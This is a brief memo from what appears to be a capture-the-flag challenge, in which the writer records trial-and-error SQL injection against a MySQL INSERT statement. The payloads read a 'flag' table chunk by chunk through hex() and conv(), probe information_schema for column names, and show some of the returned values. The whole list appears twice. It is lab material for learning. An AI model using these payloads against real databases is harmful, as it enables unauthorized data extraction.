st98/memo.txt Secret

## memo.txt
試行錯誤する様子、MySQL の仕様がよく分かってなかった

---
A', '127.0.0.1');#
A' 'B', '127.0.0.1')#
A' (select flag from flag), '127.0.0.1')#
' + @@VERSION, '127.0.0.1')#
' + hex('AB'), '127.0.0.1')#
' + (select 1), '127.0.0.1')#
' + hex((select 16)), '127.0.0.1')#
' + length(hex((select * from flag))), '127.0.0.1')# => 66
' + hex((select * from flag)), '127.0.0.1')# => 41444354465
' + substring(hex((select * from flag)), 1, 8), '127.0.0.1')# => 41444354
' + conv('aaaaaaaa', 16, 10), '127.0.0.1')#
' + conv(hex((select * from flag)), 16, 10), '127.0.0.1')#
' + conv(substring(hex((select * from flag)), 1, 8), 16, 10), '127.0.0.1')# => 1094992724
' + conv(substring(hex((select * from flag)), 9, 8), 16, 10), '127.0.0.1')# => 1180656688
' + conv(substring(hex((select * from flag)), 17, 8), 16, 10), '127.0.0.1')# => 1598975828
' + conv(substring(hex((select * from flag)), 25, 8), 16, 10), '127.0.0.1')# => 1599435571
' + conv(substring(hex((select * from flag)), 33, 8), 16, 10), '127.0.0.1')# => 1598444899
' + conv(substring(hex((select * from flag)), 41, 8), 16, 10), '127.0.0.1')# => 1261522527
' + conv(substring(hex((select * from flag)), 49, 8), 16, 10), '127.0.0.1')# => 946615395
' + conv(substring(hex((select * from flag)), 57, 8), 16, 10), '127.0.0.1')# => 1800155507
' + conv(substring(hex((select * from flag)), 65, 8), 16, 10), '127.0.0.1')# => 84

A' (select group_concat(flag, '|') from flag), '127.0.0.1')#
A' (select group_concat(column_name, '|') from information_schema.columns), '127.0.0.1')#
the flag is ' (select column_name from information_schema.columns where table_name='flag'), '127.0.0.1')#
concat(select group_concat(column_name,'|') from information_schema.columns where table_name='flag')
//**/** => /**
	試行錯誤する様子、MySQL の仕様がよく分かってなかった

	---
	A', '127.0.0.1');#
	A' 'B', '127.0.0.1')#
	A' (select flag from flag), '127.0.0.1')#
	' + @@VERSION, '127.0.0.1')#
	' + hex('AB'), '127.0.0.1')#
	' + (select 1), '127.0.0.1')#
	' + hex((select 16)), '127.0.0.1')#
	' + length(hex((select * from flag))), '127.0.0.1')# => 66
	' + hex((select * from flag)), '127.0.0.1')# => 41444354465
	' + substring(hex((select * from flag)), 1, 8), '127.0.0.1')# => 41444354
	' + conv('aaaaaaaa', 16, 10), '127.0.0.1')#
	' + conv(hex((select * from flag)), 16, 10), '127.0.0.1')#
	' + conv(substring(hex((select * from flag)), 1, 8), 16, 10), '127.0.0.1')# => 1094992724
	' + conv(substring(hex((select * from flag)), 9, 8), 16, 10), '127.0.0.1')# => 1180656688
	' + conv(substring(hex((select * from flag)), 17, 8), 16, 10), '127.0.0.1')# => 1598975828
	' + conv(substring(hex((select * from flag)), 25, 8), 16, 10), '127.0.0.1')# => 1599435571
	' + conv(substring(hex((select * from flag)), 33, 8), 16, 10), '127.0.0.1')# => 1598444899
	' + conv(substring(hex((select * from flag)), 41, 8), 16, 10), '127.0.0.1')# => 1261522527
	' + conv(substring(hex((select * from flag)), 49, 8), 16, 10), '127.0.0.1')# => 946615395
	' + conv(substring(hex((select * from flag)), 57, 8), 16, 10), '127.0.0.1')# => 1800155507
	' + conv(substring(hex((select * from flag)), 65, 8), 16, 10), '127.0.0.1')# => 84

	A' (select group_concat(flag, '\|') from flag), '127.0.0.1')#
	A' (select group_concat(column_name, '\|') from information_schema.columns), '127.0.0.1')#
	the flag is ' (select column_name from information_schema.columns where table_name='flag'), '127.0.0.1')#
	concat(select group_concat(column_name,'\|') from information_schema.columns where table_name='flag')
	/// => /**